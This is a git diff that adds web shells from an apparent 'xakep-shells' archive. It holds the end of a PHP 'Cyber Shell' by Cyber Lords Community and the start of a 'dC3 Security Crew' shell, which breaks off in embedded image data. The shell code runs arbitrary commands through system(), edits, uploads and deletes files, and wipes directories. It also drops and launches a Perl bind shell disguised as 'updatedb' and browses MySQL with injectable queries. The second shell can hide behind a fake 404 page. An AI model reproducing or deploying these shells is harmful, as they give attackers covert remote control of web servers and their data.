+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+  <tr>
+    <td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">Ïàïêà ïóñòà</td>
+  </tr>
+</table>
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+<center>
+<form  action=\"$PHP_SELF\" method=\"POST\">";
+$mydir=updir($edit);
+echo "
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåðíóòüñÿ ê $mydir/</a><br>
+Âû ðåäàêòèðóåòå ôàéë : $edit<br>
+<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">Ïðîñìîòðåòü ýòîò ôàéë â âèäå HTML</span></a>
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
+<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
+";
+if (!isset($_REQUEST[readonly]))
+echo "<input type=\"submit\"  value=\"            Ñîõðàíèòü            \" >";
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</form>
+</center>
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+<center>
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåðíóòüñÿ ê $mydir/</a><br>
+Âû ïðîñìàòðèâàåòå ôàéë : $edit
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+";
+readfile($edit);
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</center>
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+</td>
+</tr>
+</table>
+</center>
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ïàïêó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=tools>
+<input type=text size=55 name=newdir value="$d/Íîâàÿ ïàïêà">
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if(@$_GET['rename']){
+echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$filetorename'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ôàéë :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=text size=55 name=newfile value="$d/newfile.php">
+<input type=hidden name=tools>
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Îòêðûòü ïîðò :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+Èìÿ ñêðèïòà: <input type=text size=13 name=bfileneme value="bind.pl"> Ïîðò: <input type=text size=10 name=bport value="65426">
+<input type="hidden" name="d" value="$d" >
+<input type=hidden name=tools>
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="GET">
+<input type="hidden" name="d" value="$d" >
+.: Âûïîëíèòü êîìàíäó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=diz>
+<input type=hidden name=tbash>
+<input type=text size=55 name=cmd value="$cmd">
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "<pre><div align=\"left\">";
+system($cmd);
+echo "</div></pre>";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form ENCTYPE="multipart/form-data"  action="$PHP_SELF" method="post">
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<INPUT NAME="userfile" TYPE="file" SIZE="40">
+<input type="hidden" name="d" value="$d">
+<input type=hidden name=diz>
+<input type=hidden name=tupload>
+<input type="submit" name=go value="Îòïðàâèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ðàçìåðîì $userfile_size áàéò â äèðåêòîðèþ $updir";
+}
+echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>Íàçàä ê êàòàëîãó</a>";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëþ÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname</a>";
+mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>Óäàëèòü</a></td></tr>";
+$pixidname='';
+$pixid='';
+}
+
+echo "<form  action=\"$PHP_SELF\" method=\"POST\">";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
+}}
+echo "</tr>";
+echo "</table>";
+echo "<input type=\"submit\"  value=\"Äîáàâèòü íîâóþ çàïèñü\" >";
+echo "
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
+<input type=\"hidden\" name=\"table\" value=\"$table\">
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+";
+echo "</form>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+<form  action=\"$PHP_SELF\" method=\"POST\">
+<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
+<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
+<input type=\"hidden\" name=\"var\" value=\"$var\" >
+<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
+<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+<br><input type=\"submit\"  value=\"            Èçìåíèòü            \" >
+</form>
+<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Âåðíóòüñÿ ê ñïèñêó</a>
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>Ñïèñîê äîñòóïíûõ ÁÄ:</span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
+}
+echo "</table>";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó ÁÄ</a>";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - Ñïèñîê òàáëèö: </span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
+}
+echo "</table>";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+<form  action="$PHP_SELF" method="get">
+<input type="hidden" name="showtables" value="$showtables" >
+<input type="hidden" name="db_server" value="$db_server" >
+<input type="hidden" name="db_user" value="$db_user" >
+<input type="hidden" name="db_pass" value="$db_pass" >
+îãðàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:<br>
+<select name="xlimit">
+  <option value="0">&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1074;&#1089;&#1105;</option>
+  <option value="10">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 10</option>
+  <option value="20">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 20</option>
+  <option value="30">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 30</option>
+  <option value="50">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 50</option>
+  <option value="100">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 100</option>
+  <option value="200">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 200</option>
+  <option value="500">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 500</option>
+  <option value="1000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 1000</option>
+  <option value="5000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 5000</option>
+</select>
+<br>Âêëþ÷èòü îãðàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé <input name="xlenth" type="checkbox" value="on" $ch><br>
+<input type="submit"  value="Ïðèìåíèòü" >
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "<br>Òåêóùåå îãðàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+<center>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
+<tr height='10'>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
+.: MySQL :.
+</td>
+</tr height='10'>
+<tr>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
+<form name='zapros' method='get' action=''>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Host
+</td>
+<td>
+<input name='db_server' type='text' value='localhost'>
+</td>
+</tr>
+<tr align='center' >
+<td>
+Login MySQL
+</td> 
+<td>
+<input type='text' name='db_user' value=''> 
+</tr>
+<tr align='center' >
+<td>
+Password MySQL
+</td> 
+<td>
+<input type='text' name='db_pass' value=''>
+<input type='hidden' name='showdb'>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+</td> 
+<td>
+<input type='text' name='showtables' value=''>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+<td>
+<input type='reset'>
+</td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+</center>
+";
+}
+echo <<< EOF
+<center>.:Cyber Shell (v 1.0):.<br>Copyright © <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
+</td>
+</tr>
+</table>
+EOF;
+
+$d=tourl($d);
+echo "
+<center>
+<span class='style1'>
+<a href=$PHP_SELF?d=$d&diz&tmkdir>.: Ñîçäàòü ïàïêó :.</a>
+<a href=$PHP_SELF?d=$d&diz&tmkfile>.: Ñîçäàòü ôàéë :.</a>
+<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: Îòêðûòü ïîðò äëÿ ïîäêëþ÷åíèÿ :.</a><br>
+<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
+<a href=$PHP_SELF?d=$d&diz&tupload>.: Çàêà÷àòü ôàéë :.</a>
+</span>
+</center>
+";
+}
+die;
+?>
diff --git a/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt b/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt
new file mode 100644
index 0000000..e99383d
--- /dev/null
+++ b/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt	
@@ -0,0 +1,1273 @@
+<?PHP
+/* 
+ver=5
+----------------------Only For Priv8 Use---------------------------------
+               I dont support illegal actions!
+-------------------------------------------------------------------------
+          dC3 Security Crew
+-------------------------------------------------------------------------
+By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
+-------------------------------------------------------------------------
+Shell written by Bl0od3r
+-------------------------------------------------------------------------
+Easy file managing with a lot of features!
+-------------------------------------------------------------------------
+In work:
+special file options
+-------------------------------------------------------------------------
+*/
+//important
+error_reporting(5);
+@ignore_user_abort(true);
+//
+
+$safe="off";
+$word="secret";
+if ($safe=="on") {
+if (!isset($_GET[$word])) {
+   header('HTTP/1.0 404 Not Found');
+   exit;
+   }
+ }
+$made_by="Bl0od3r";
+$of="Netplayazz";
+($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
+($of=="dc3") ? $fake=0 :  $fake=1;
+$st_dir=".";
+$p=str_replace("\\","/",realpath($_GET['file']));
+$j_d=$_GET['file'];
+$j_f=$_GET['file'];
+$filename = $_GET['file'];
+$file_info = pathinfo($filename);
+$extn = $file_info['extension'];
+
+
+if (isset($_GET['dir'])) {
+ $images = array(
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
+f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
+aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
+95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
+YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
+D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
+YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
+AAAASUVORK5CYII=",
+"o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
+AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
+AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
+dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
+ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
+AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
+AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
+EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
+ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
+t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
+Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
+LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
+ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
+CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
+IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
+AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
++wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
+AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
+wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
+BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
+pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
+B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
+zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
+DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
